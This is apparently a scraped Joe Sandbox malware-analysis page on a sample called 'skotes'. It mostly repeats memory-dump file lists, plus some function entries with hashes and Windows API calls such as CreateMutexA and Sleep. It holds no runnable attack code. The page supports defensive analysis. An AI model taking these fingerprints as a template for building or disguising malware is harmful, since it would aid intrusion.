Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 15c542c499e7e1f299be7635ba0be4c0ce02bcd293dfa1f221c93aca5e4c2eec
Instruction ID: 063ce06b419a10eb82f42876ac67b6fde80ea913172a1ec1088b6ba9b0e7d0b7
Opcode Fuzzy Hash: 15c542c499e7e1f299be7635ba0be4c0ce02bcd293dfa1f221c93aca5e4c2eec
Instruction Fuzzy Hash: 893168326401408BEB18DB78DC89FADB766EFC6310F248659E414EB3D1CB399D858B52

Function 0094A079 Relevance: 4.6, APIs: 3, Instructions: 136sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0094A07C
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 02b3641a51815387ffb57a65ce0faa5efb168ef3fcad3726f07f3fcdaf97173e
Instruction ID: bf579ee3f8ed48d9225eb8f143420cee54cdbe882781cf450a8c5b1cfbbc295e
Opcode Fuzzy Hash: 02b3641a51815387ffb57a65ce0faa5efb168ef3fcad3726f07f3fcdaf97173e
Instruction Fuzzy Hash: 863186326842409BFB18DB78DCC9F6DB776DFC6314F248219E424973D1CB3A99808B52

Function 0094A1AE Relevance: 4.6, APIs: 3, Instructions: 135sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0094A1B1
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: bcac9f2afbe089710c44fe18fb95145da4e91bc8e5d2d6f8a2ad7250e230308d
Instruction ID: e0ccdff6b6628cc749fc9a9c8a855592070407f1d872798c2a276aeaccbb4f51
Opcode Fuzzy Hash: bcac9f2afbe089710c44fe18fb95145da4e91bc8e5d2d6f8a2ad7250e230308d
Instruction Fuzzy Hash: F83135326841419FEB18DB78DCC9F6DB766EFCA310F248219E424973D1C77A99808B52

Function 0094A2E3 Relevance: 4.6, APIs: 3, Instructions: 134sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0094A2E6
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: f4584b6b6ce5c2e81c8fd3b89efc98d7141514a5076c41ce222a26a18c8d9fd5
Instruction ID: 58dc4360a0161e4f35363813ff4c757989ecde7141da00b4b0e15c268539e426
Opcode Fuzzy Hash: f4584b6b6ce5c2e81c8fd3b89efc98d7141514a5076c41ce222a26a18c8d9fd5
Instruction Fuzzy Hash: AB3188326802408BEB18DF78DCC9F6DB776EFC2314F248218E424977D1D73A99808B52

Function 0094A418 Relevance: 4.6, APIs: 3, Instructions: 133sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0094A41B
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
